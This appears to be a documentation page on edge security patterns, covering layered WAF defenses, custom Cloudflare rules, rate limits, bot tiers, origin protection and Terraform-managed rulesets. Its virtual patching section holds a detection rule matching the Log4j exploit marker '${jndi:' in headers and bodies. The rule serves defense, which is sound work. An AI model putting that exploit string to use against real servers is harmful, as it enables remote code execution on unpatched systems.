Patterns
Layered defense, custom WAF rules, virtual patching, bot management strategies, API-specific protection, observability
Patterns
The patterns that turn off-the-shelf edge security into something tuned to your specific risk surface.
Layered Defense (Defense in Depth)
Don't rely on one layer:
[Client] → [DDoS scrub] L3/L4 absorption
→ [CDN cache] Static content offload
→ [WAF (edge)] Pattern matching
→ [Bot management] Behavior + fingerprint
→ [Rate limiter] Per-key throttling
→ [API gateway] AuthN/AuthZ + per-route limits
→ [App WAF / RASP] Last-mile filtering
→ [Application] Secure code
→ [Origin protection] Allow only edge IPsEach layer has a different failure mode; an attack that defeats one usually doesn't defeat them all. Cloudflare + AWS WAF on the ALB is a common belt-and-suspenders setup for serious workloads.
Custom WAF Rules
Managed rules cover OWASP commons. Custom rules cover your specific needs:
# Cloudflare custom rule examples
Block requests where:
http.request.uri.path matches "^/api/internal/" AND
ip.src not in {192.0.2.0/24, 198.51.100.0/24}
Action: Block
Reason: internal endpoints not for public
Allow requests where:
http.request.uri.path eq "/health" AND
ip.src in {10.0.0.0/8, 172.16.0.0/12}
Action: Allow (priority high)
Reason: skip rate limit for monitoring
Challenge requests where:
http.request.method eq "POST" AND
http.request.uri.path eq "/login" AND
cf.threat_score gt 30
Action: Managed ChallengeThe pattern: managed rules block obvious bad; custom rules express your application's specific access rules and exceptions.
Virtual Patching
A CVE drops for your framework. Patching takes time (test, stage, deploy). WAF can virtually patch within minutes.
Example: Log4j (CVE-2021-44228). The exploit is a string ${jndi:...} in any header. WAF rule:
http.user_agent contains "${jndi:" OR
http.request.body contains "${jndi:" OR
any(http.request.headers[*] contains "${jndi:")
Action: BlockYou can deploy this in 15 minutes. The Java patch takes a sprint. Virtual patch buys you the time.
The catch: virtual patches are temporary. They protect known exploitation patterns. Don't skip the real fix; the attacker will eventually craft a payload your virtual patch misses.
API-Specific Protection
Web traffic and API traffic have very different shapes:
| Web | API |
|---|---|
| Browsers, HTML, JS | Programs, JSON, gRPC |
| Static cacheable | Dynamic, mostly authenticated |
| Bot challenges work | Bot challenges break clients |
| Rate limit by IP | Rate limit by API key |
| WAF rules for SQLi in URL | Rules for SQLi in JSON body |
API-aware protection:
- Schema validation: only POST bodies matching the OpenAPI schema are allowed
- OAuth / API key required: enforce at the edge
- Per-key rate limits: free tier vs paid tier
- Method restrictions: only POST/GET on this endpoint, no PUT/DELETE
- Body content scan: SQLi/XSS patterns in JSON values, not just URLs
Cloudflare API Shield, AWS WAF API protection, Fastly Next-Gen WAF, Salt Security, Noname Security target this segment.
Bot Management Strategy
Not all bots are bad. Build a tiered strategy:
# Allowlist verified search engines (priority 1)
If: user_agent matches "googlebot|bingbot|slackbot" AND verified
Action: Allow
# Allow known monitoring (priority 2)
If: user_agent matches "uptime-robot|datadog-checks" AND ip in {known_ranges}
Action: Allow
# Challenge suspicious (priority 3)
If: client's TLS fingerprint matches "headless-chrome"
Action: Managed Challenge
# Block known bad
If: ip.src in known_bad_ips OR threat_score > 40
Action: Block
# Default
Action: AllowFor high-value endpoints (login, checkout):
- Always challenge on suspicious signals
- Lower threshold for friction (Turnstile is brief; legitimate users don't mind)
- Track outcomes: how often does the bot challenge fire? How often is it solved? If solve rate is low, you're blocking real users
Rate Limiting Strategies
Beyond "X requests per minute":
| Strategy | When |
|---|---|
| Fixed window | Simple but bursty at window boundaries |
| Sliding window | Smooth; preferred for user-facing limits |
| Token bucket | Burst-tolerant; good for API users |
| Leaky bucket | Smooth output; good when origin can't burst |
| Concurrency limit | Limit concurrent requests rather than rate |
| Adaptive | Tighten when error rate or latency rises |
Per-endpoint tuning:
/login: 5/min/IP, 100/hour/IP, then challenge
/api/search: 100/min/key, 10k/day/key
/api/checkout: 20/min/key, customer-tier-aware
/health: unlimited
/static/*: CDN-cached, no rate limit neededThe login endpoint deserves the tightest limits — credential stuffing is the #1 abuse pattern.
Geo-Based Controls
Geo blocking is crude but useful:
- Block countries you don't serve: if your business is US-only, blocking 90% of the world removes 90% of the attack surface.
- Lower thresholds for high-risk geos: not block, but more aggressive challenges.
- Compliance: data sovereignty rules may require geo-routing to specific regions.
Be careful: VPN users in legitimate countries appear from anywhere. Don't block legitimate customers; tier the action by risk level.
Origin Protection (Hidden Origin)
Edge protection is worthless if attackers can hit your origin directly. Methods:
- Allowlist Cloudflare IPs in your security group / firewall.
- Cloudflare Tunnel / AWS PrivateLink / GCP Private Service Connect: origin has no public IP at all.
- Authenticated origin pulls: WAF includes a client cert; origin rejects connections without it.
- mTLS: origin requires WAF's cert to talk.
Many a tale of woe: "We have a WAF!" Yes, but dig +short origin.your-app.com resolves to a public IP. Lock it down.
Observability for Edge Security
Edge events are signal-rich. Ingest them:
- WAF event logs → SIEM (Splunk, Datadog, OpenSearch). Real-time queries.
- Rate-limit hits → metric (
waf_rate_limit_block_total{rule="login"}) - Bot scores → Grafana dashboard showing legitimate vs. suspicious traffic mix
- Anomaly alerts: sudden spike in 403s, new IPs, unusual country distribution
Alert on:
- Sudden rule-block-rate increase (might be attack OR new false positive — investigate)
- Authenticated user being blocked (likely false positive; fix urgently)
- Origin traffic from non-WAF IP (origin protection breach)
- DDoS scrubbing engaged (provider notification)
Connect to your Observability Pipelines to route these.
Cookie-Less Sessions and Cache
Modern attackers use the same browser tools as users. Your CDN/WAF must distinguish them without breaking caching:
- Cache by URL + query string only — not by cookie (else cache hit rate craters)
- Bot signals influence rules, not cache — bot gets blocked but cache key is the same
- Separate API routes from cacheable routes —
/api/*and/cms/*get different policies
Cache miss rate is the secret cost of misconfigured WAFs. A WAF that breaks cache hit ratio costs you in origin load and latency.
Multi-Tenant SaaS Considerations
Different customers, different risk profiles, possibly different regulations:
- Per-tenant WAF rules: enterprise tenants might have stricter custom rules
- Per-tenant rate limits: based on contracted tier
- Tenant isolation: an attack on one tenant shouldn't drown the others
- Audit logs per tenant: customer's security team can review their own traffic
Cloudflare Enterprise and AWS WAF both support per-resource rules; map your tenants to those.
CI for WAF Rules
WAF rules deserve the same engineering discipline as code:
- Store rules in Git (Terraform Cloudflare provider, AWS WAF JSON in Git)
- Code review before changes
- Test in staging WAF first
- Audit log of rule changes
- Tagging of rules (link to ticket / CVE / compliance requirement)
# Terraform Cloudflare provider
resource "cloudflare_ruleset" "waf" {
zone_id = var.zone_id
name = "WAF rules"
kind = "zone"
phase = "http_request_firewall_custom"
rules {
expression = "(http.request.uri.path matches \"^/api/admin\" and not ip.src in $admin_ips)"
action = "block"
description = "Admin API restricted to known IPs (ticket: SEC-1234)"
}
}Anti-Patterns
Block-only WAFs. No log mode, no analysis, just block. You'll either over-block or under-block; you won't know which.
Forgotten origin exposure. WAF protects the edge; origin has a public IP. Attacker just hits origin. Lock it down.
Permanent virtual patches. Virtual patch deployed in panic for CVE X; never followed up with the real fix. Eventually the WAF rule is bypassed.
Single point of failure at the WAF. Cloudflare has outages too. Plan: how does your service degrade if the WAF is unavailable? Fail-open (risky) or fail-closed (downtime).
Bot management too aggressive. Legitimate users from VPNs / corporate proxies get challenged constantly. Solve rate matters; tune.
Geo-blocks without exceptions for support. Your customer in country X can't reach you. Build the exception process before you need it.
No alerting on WAF metrics. You miss the slow attack that nibbles for a week. Alert on changes, not just thresholds.
What's Next
- Best Practices — tuning false positives, attack runbook, common pitfalls, scaling